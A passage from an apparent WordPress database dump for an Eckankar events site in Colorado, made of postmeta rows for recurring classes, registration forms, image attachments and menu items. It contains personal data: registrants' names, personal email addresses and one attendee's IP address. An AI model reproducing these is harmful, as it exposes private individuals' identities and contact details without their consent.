ype\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122113,263245,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628577;s:24:\"boldgrid_hide_page_title\";i:1610628577;s:16:\"_EventRecurrence\";i:1610628577;s:17:\"_EventShowMapLink\";i:1610628577;s:13:\"_EventShowMap\";i:1610628577;s:20:\"_EventCurrencySymbol\";i:1610628577;s:22:\"_EventCurrencyPosition\";i:1610628577;s:10:\"_EventCost\";i:1610628577;s:9:\"_EventURL\";i:1610628577;s:14:\"_EventTimezone\";i:1610628577;s:12:\"_dp_original\";i:1610628577;s:16:\"protect_children\";i:1610628577;s:26:\"_RTECregistrationsDisabled\";i:1610628577;s:17:\"_RTECdeadlineType\";i:1610628577;s:19:\"_RTECwhoCanRegister\";i:1610628577;s:23:\"_RTEClimitRegistrations\";i:1610628577;s:21:\"_RTECmaxRegistrations\";i:1610628577;s:13:\"_EventVenueID\";i:1610628577;s:13:\"_thumbnail_id\";i:1610628577;s:12:\"_wp_old_slug\";i:1610628577;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628577;s:16:\"tribe_events_cat\";i:1610653777;}'),(122481,263255,'_EventURL',''),(122479,263255,'_EventCurrencyPosition','prefix'),(122480,263255,'_EventCost',''),(122475,263255,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122474,263255,'boldgrid_hide_page_title','1'),(122489,263255,'_RTECmaxRegistrations','30'),(122490,263255,'_EventVenueID','262507'),(122492,263255,'_wp_old_slug','soul-travel-2-class'),(122493,263255,'_wp_old_slug','the-easy-way'),(122494,263255,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:2:{i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(95557,262061,'_field_182','CO'),(95558,262061,'_field_183','US'),(95559,262061,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(95560,262061,'_form_id','17'),(95561,262061,'_seq_num','2'),(95562,262062,'_field_224','catherine'),(95563,262062,'_field_225','Stevens'),(97447,262259,'smush-info','The file was compressed from 488.88 KB to 479.02 KB saving 2.02 percent using WP-Optimize'),(95643,262070,'_EventStartDateUTC','2020-12-13 17:30:00'),(95644,262070,'_EventEndDateUTC','2020-12-13 18:30:00'),(95645,262070,'_EventDuration','3600'),(95646,262070,'_EventCurrencySymbol',''),(95647,262070,'_EventCurrencyPosition','prefix'),(95648,262070,'_EventCost',''),(95649,262070,'_EventURL',''),(95634,262070,'_EventOrigin','events-calendar'),(95635,262070,'_EventOrigin','events-calendar'),(95636,262070,'_EventOrigin','events-calendar'),(95642,262070,'_EventEndDate','2020-12-13 11:30:00'),(95633,262070,'_EventOrigin','events-calendar'),(95632,262070,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1601131342;s:12:\"_EventOrigin\";i:1601131342;s:13:\"_thumbnail_id\";i:1607506407;s:24:\"boldgrid_hide_page_title\";i:1601131342;s:17:\"_EventShowMapLink\";i:1606903250;s:13:\"_EventShowMap\";i:1606903250;s:15:\"_EventStartDate\";i:1607030943;s:13:\"_EventEndDate\";i:1607030943;s:18:\"_EventStartDateUTC\";i:1607030943;s:16:\"_EventEndDateUTC\";i:1607030943;s:14:\"_EventDuration\";i:1601131342;s:20:\"_EventCurrencySymbol\";i:1601131342;s:22:\"_EventCurrencyPosition\";i:1601131342;s:10:\"_EventCost\";i:1601131342;s:9:\"_EventURL\";i:1601131342;s:14:\"_EventTimezone\";i:1601131342;s:18:\"_EventTimezoneAbbr\";i:1606824340;s:13:\"_EventVenueID\";i:1606824404;s:27:\"_EventNextPendingRecurrence\";i:1601131342;s:12:\"_dp_original\";i:1601131342;s:16:\"tribe_events_cat\";i:1609185835;s:10:\"_edit_last\";i:1601131421;s:10:\"post_title\";i:1606986678;s:12:\"post_content\";i:1607374243;s:26:\"_RTECregistrationsDisabled\";i:1601131568;s:17:\"_RTECdeadlineType\";i:1601131568;s:19:\"_RTECwhoCanRegister\";i:1601131568;s:23:\"_RTEClimitRegistrations\";i:1601131568;s:21:\"_RTECmaxRegistrations\";i:1601131568;s:16:\"_EventRecurrence\";i:1601131568;s:11:\"post_status\";i:1606903250;s:18:\"_RTECnumRegistered\";i:1607797894;}'),(95638,262070,'boldgrid_hide_page_title','0'),(95564,262062,'_field_226','catestevens8@gmail.com'),(95565,262062,'_field_227','CO'),(95566,262062,'_field_228','US'),(95567,262062,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(95568,262062,'_form_id','21'),(95569,262062,'_seq_num','105'),(103873,262422,'_EventTimezone','America/Denver'),(103874,262422,'_EventTimezoneAbbr','MST'),(103875,262422,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(103853,262422,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1606986786;s:12:\"_EventOrigin\";i:1606986786;s:13:\"_thumbnail_id\";i:1606988354;s:24:\"boldgrid_hide_page_title\";i:1606986786;s:17:\"_EventShowMapLink\";i:1606986786;s:13:\"_EventShowMap\";i:1606986786;s:15:\"_EventStartDate\";i:1607030875;s:13:\"_EventEndDate\";i:1607030875;s:18:\"_EventStartDateUTC\";i:1607030875;s:16:\"_EventEndDateUTC\";i:1607030875;s:14:\"_EventDuration\";i:1606988354;s:20:\"_EventCurrencySymbol\";i:1606986786;s:22:\"_EventCurrencyPosition\";i:1606986786;s:10:\"_EventCost\";i:1606986786;s:9:\"_EventURL\";i:1606986786;s:14:\"_EventTimezone\";i:1606986786;s:18:\"_EventTimezoneAbbr\";i:1606986786;s:27:\"_EventNextPendingRecurrence\";i:1606986786;s:12:\"_dp_original\";i:1606986787;s:26:\"_RTECregistrationsDisabled\";i:1606989199;s:17:\"_RTECdeadlineType\";i:1606986787;s:19:\"_RTECwhoCanRegister\";i:1606986787;s:23:\"_RTEClimitRegistrations\";i:1606986787;s:21:\"_RTECmaxRegistrations\";i:1606986787;s:16:\"_EventRecurrence\";i:1606986787;s:18:\"_RTECnumRegistered\";i:1606986815;s:13:\"_EventVenueID\";i:1606991997;s:16:\"tribe_events_cat\";i:1609185816;s:10:\"_edit_last\";i:1606986890;s:10:\"post_title\";i:1606989354;s:12:\"post_content\";i:1607074095;s:11:\"post_status\";i:1606989050;s:22:\"_EventHideFromUpcoming\";i:1606989304;}'),(103861,262422,'boldgrid_hide_page_title','0'),(103870,262422,'_EventCurrencyPosition','prefix'),(103871,262422,'_EventCost',''),(103872,262422,'_EventURL',''),(103854,262422,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1606986786;s:12:\"_EventOrigin\";i:1606986786;s:13:\"_thumbnail_id\";i:1606988354;s:24:\"boldgrid_hide_page_title\";i:1606986786;s:17:\"_EventShowMapLink\";i:1606986786;s:13:\"_EventShowMap\";i:1606986786;s:15:\"_EventStartDate\";i:1607030875;s:13:\"_EventEndDate\";i:1607030875;s:18:\"_EventStartDateUTC\";i:1607030875;s:16:\"_EventEndDateUTC\";i:1607030875;s:14:\"_EventDuration\";i:1606988354;s:20:\"_EventCurrencySymbol\";i:1606986786;s:22:\"_EventCurrencyPosition\";i:1606986786;s:10:\"_EventCost\";i:1606986786;s:9:\"_EventURL\";i:1606986786;s:14:\"_EventTimezone\";i:1606986786;s:18:\"_EventTimezoneAbbr\";i:1606986786;s:27:\"_EventNextPendingRecurrence\";i:1606986786;s:12:\"_dp_original\";i:1606986787;s:26:\"_RTECregistrationsDisabled\";i:1606989199;s:17:\"_RTECdeadlineType\";i:1606986787;s:19:\"_RTECwhoCanRegister\";i:1606986787;s:23:\"_RTEClimitRegistrations\";i:1606986787;s:21:\"_RTECmaxRegistrations\";i:1606986787;s:16:\"_EventRecurrence\";i:1606986787;s:18:\"_RTECnumRegistered\";i:1606986815;s:13:\"_EventVenueID\";i:1606991997;s:16:\"tribe_events_cat\";i:1609185816;s:10:\"_edit_last\";i:1606986890;s:10:\"post_title\";i:1606989354;s:12:\"post_content\";i:1607074095;s:11:\"post_status\";i:1606989050;s:22:\"_EventHideFromUpcoming\";i:1606989304;}'),(103856,262422,'_EventOrigin','events-calendar'),(103857,262422,'_EventOrigin','events-calendar'),(103858,262422,'_EventOrigin','events-calendar'),(103859,262422,'_EventOrigin','events-calendar'),(103860,262422,'_thumbnail_id','262424'),(103864,262422,'_EventStartDate','2020-12-05 10:30:00'),(103855,262422,'_EventOrigin','events-calendar'),(103885,262422,'_dp_original','262070'),(103877,262422,'_RTECregistrationsDisabled','1'),(97452,262315,'smush-complete','1'),(97453,262315,'smush-info','The file was compressed from 44.59 KB to 41.99 KB saving 5.84 percent using WP-Optimize'),(97454,262315,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:45664;s:12:\"smushed-size\";i:42999;s:15:\"savings-percent\";d:5.839999999999999857891452847979962825775146484375;}'),(118816,262953,'_EventVenueID','262507'),(118734,262916,'_RTECregistrationsDisabled','1'),(118733,262916,'_EventOrigin','events-calendar'),(118750,262916,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118735,262916,'_RTECdeadlineType','start'),(118736,262916,'_RTECwhoCanRegister','any'),(118737,262916,'_RTEClimitRegistrations','0'),(118738,262916,'_RTECmaxRegistrations','30'),(118739,262916,'boldgrid_hide_page_title','0'),(118740,262916,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118741,262916,'_EventShowMapLink','1'),(118742,262916,'_EventShowMap','1'),(118743,262916,'_EventVenueID','262507'),(118744,262916,'_EventCurrencySymbol',''),(118745,262916,'_EventCurrencyPosition','prefix'),(118746,262916,'_EventCost',''),(118747,262916,'_EventURL',''),(118748,262916,'_EventTimezone','America/Denver'),(96808,262268,'_form_id','13'),(96809,262268,'_seq_num','57'),(160558,266604,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:22:\"ticket_start_time_hour\";s:2:\"11\";s:24:\"ticket_start_time_minute\";s:2:\"45\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"01\";s:22:\"ticket_end_time_minute\";s:1:\"0\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(63815,7172,'protect_children',''),(62767,248046,'_wp_attached_file','2020/01/eck-temple-co-sized.jpg'),(62768,248046,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:361;s:6:\"height\";i:231;s:4:\"file\";s:31:\"2020/01/eck-temple-co-sized.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"eck-temple-co-sized-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"eck-temple-co-sized-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:29:\"eck-temple-co-sized-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:31:\"eck-temple-co-sized-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:31:\"eck-temple-co-sized-250x160.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:31:\"eck-temple-co-sized-281x180.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:31:\"eck-temple-co-sized-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wpcl_postmeta` VALUES (179348,268206,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:279;s:6:\"height\";i:52;s:4:\"file\";s:28:\"2023/03/footer-9-3-16-23.png\";s:8:\"filesize\";i:10333;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"footer-9-3-16-23-150x52.png\";s:5:\"width\";i:150;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3514;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179352,268206,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10333;s:12:\"smushed-size\";i:4607;s:15:\"savings-percent\";d:55.41;s:10:\"sizes-info\";a:2:{s:4:\"full\";a:2:{s:8:\"original\";i:10333;s:10:\"compressed\";i:4607;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3514;s:10:\"compressed\";i:2729;}}}'),(179350,268206,'smush-complete','1'),(179351,268206,'smush-info','The file was compressed from 10.09 KB to 4.50 KB saving 55.41 percent using WP-Optimize'),(179359,268208,'mec_more_info',''),(179358,268208,'mec_read_more',''),(179357,268208,'mec_organizer_id','1'),(179356,268208,'mec_dont_show_map','0'),(179355,268208,'mec_location_id','182'),(179366,268208,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-22\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179365,268208,'mec_additional_location_ids','a:0:{}'),(143786,265166,'mec_color',''),(143785,265166,'protect_children',''),(143782,265165,'_form_id','4'),(143783,265165,'_seq_num','14'),(143784,265166,'protect_children',''),(143781,265165,'_field_39',''),(141923,32170,'passster_activate_global_protection',NULL),(143836,265166,'mec_additional_location_ids','a:0:{}'),(143834,265166,'mec_currency','a:0:{}'),(143835,265166,'mec_additional_organizer_ids','a:0:{}'),(94728,68102,'passster_protection_type','password'),(94727,68102,'passster_activate_protection',NULL),(143833,265166,'mec_cost',''),(143831,265166,'mec_more_info_title',''),(143832,265166,'mec_more_info_target','_self'),(143780,265165,'_field_37','US'),(179373,268208,'mec_comment',''),(179372,268208,'mec_hide_end_time','0'),(179369,268208,'mec_allday','0'),(179370,268208,'one_occurrence','0'),(179371,268208,'mec_hide_time','0'),(62331,247614,'_wp_attachment_image_alt','Beautiful Lake Scene'),(179368,268208,'mec_certain_weekdays','a:0:{}'),(179367,268208,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179383,268208,'mec_end_time_hour','1'),(179381,268208,'mec_start_day_seconds','36000'),(179382,268208,'mec_end_date','2023-04-22'),(179380,268208,'mec_start_time_ampm','AM'),(179379,268208,'mec_start_time_minutes','0'),(179378,268208,'mec_start_time_hour','10'),(177199,267954,'mec_book_date_submit','20230212102437'),(177200,267954,'mec_booking_location','129'),(177201,267954,'mec_ticket_price_1','0'),(177202,267954,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:25:\"marilynmillarhu@gmail.com\";s:4:\"name\";s:14:\"Marilyn Millar\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"74.92.211.26\";}}'),(62546,247828,'_wp_attachment_image_alt','Mountain Stream'),(177203,267954,'mec_price','0'),(177204,267954,'mec_gateway','MEC_gateway_free'),(177205,267954,'mec_gateway_label','Free'),(177206,267955,'mec_transaction_id','DFL79438'),(177402,268016,'_wp_attached_file','2023/02/for-adding-full-email.png'),(177403,268016,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1578;s:6:\"height\";i:640;s:4:\"file\";s:33:\"2023/02/for-adding-full-email.png\";s:8:\"filesize\";i:39728;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-300x122.png\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8584;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"for-adding-full-email-1024x415.png\";s:5:\"width\";i:1024;s:6:\"height\";i:415;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5146;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-768x311.png\";s:5:\"width\";i:768;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37540;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15038;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24895;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18691;}s:8:\"tileview\";a:5:{s:4:\"file\";s:33:\"for-adding-full-email-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18855;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"for-adding-full-email-1536x623.png\";s:5:\"width\";i:1536;s:6:\"height\";i:623;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89834;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177398,268014,'_wp_attached_file','2023/02/outlook-online-3-for-adding-domain.png'),(177399,268014,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1587;s:6:\"height\";i:739;s:4:\"file\";s:46:\"2023/02/outlook-online-3-for-adding-domain.png\";s:8:\"filesize\";i:54495;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10639;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"outlook-online-3-for-adding-domain-1024x477.png\";s:5:\"width\";i:1024;s:6:\"height\";i:477;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69888;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7053;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-768x358.png\";s:5:\"width\";i:768;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47108;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20187;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31934;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23238;}s:8:\"tileview\";a:5:{s:4:\"file\";s:46:\"outlook-online-3-for-adding-domain-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29822;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"outlook-online-3-for-adding-domain-1536x715.png\";s:5:\"width\";i:1536;s:6:\"height\";i:715;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114768;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(61945,247345,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61946,247345,'_menu_item_xfn',''),(61947,247345,'_menu_item_url',''),(61943,247345,'_menu_item_object','page'),(61944,247345,'_menu_item_target',''),(61937,247344,'_menu_item_url',''),(61939,247345,'protect_children',''),(61940,247345,'_menu_item_type','post_type'),(61941,247345,'_menu_item_menu_item_parent','0'),(61942,247345,'_menu_item_object_id','45842'),(61936,247344,'_menu_item_xfn',''),(61933,247344,'_menu_item_object','page'),(61934,247344,'_menu_item_target',''),(61935,247344,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61931,247344,'_menu_item_menu_item_parent','247332'),(61932,247344,'_menu_item_object_id','32170'),(61925,247343,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61926,247343,'_menu_item_xfn',''),(61927,247343,'_menu_item_url',''),(61929,247344,'protect_children',''),(61930,247344,'_menu_item_type','post_type'),(61924,247343,'_menu_item_target',''),(61921,247343,'_menu_item_menu_item_parent','247332'),(61922,247343,'_menu_item_object_id','32074'),(61923,247343,'_menu_item_object','page'),(61919,247343,'protect_children',''),(61920,247343,'_menu_item_type','post_type'),(61913,247342,'_menu_item_object','page'),(61914,247342,'_menu_item_target',''),(61915,247342,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61916,247342,'_menu_item_xfn',''),(61917,247342,'_menu_item_url',''),(61912,247342,'_menu_item_object_id','31882'),(61909,247342,'protect_children',''),(61910,247342,'_menu_item_type','post_type'),(61911,247342,'_menu_item_menu_item_parent','247332'),(94738,32170,'passster_protection_type','password'),(94737,32170,'passster_activate_protection',NULL),(168194,267076,'_seq_num','7'),(168193,267076,'_form_id','49'),(146805,265640,'_field_137','Satsang classes'),(61850,247336,'_menu_item_type','custom'),(61853,247336,'_menu_item_object','custom'),(61854,247336,'_menu_item_target',''),(61855,247336,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61856,247336,'_menu_item_xfn',''),(61857,247336,'_menu_item_url','#'),(61813,247332,'_menu_item_object','page'),(61814,247332,'_menu_item_target',''),(61815,247332,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(61816,247332,'_menu_item_xfn',''),(59505,45842,'protect_children',''),(118161,262872,'_EventOrigin','events-calendar'),(29739,204589,'_wp_attached_file','2019/12/co-EK-BGrid-logo-title-image.png'),(29740,204589,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:254;s:6:\"height\";i:53;s:4:\"file\";s:40:\"2019/12/co-EK-BGrid-logo-title-image.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"co-EK-BGrid-logo-title-image-150x53.png\";s:5:\"width\";i:150;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:38:\"co-EK-BGrid-logo-title-image-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:39:\"co-EK-BGrid-logo-title-image-250x52.png\";s:5:\"width\";i:250;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"co-EK-BGrid-logo-title-image-210x53.png\";s:5:\"width\";i:210;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s: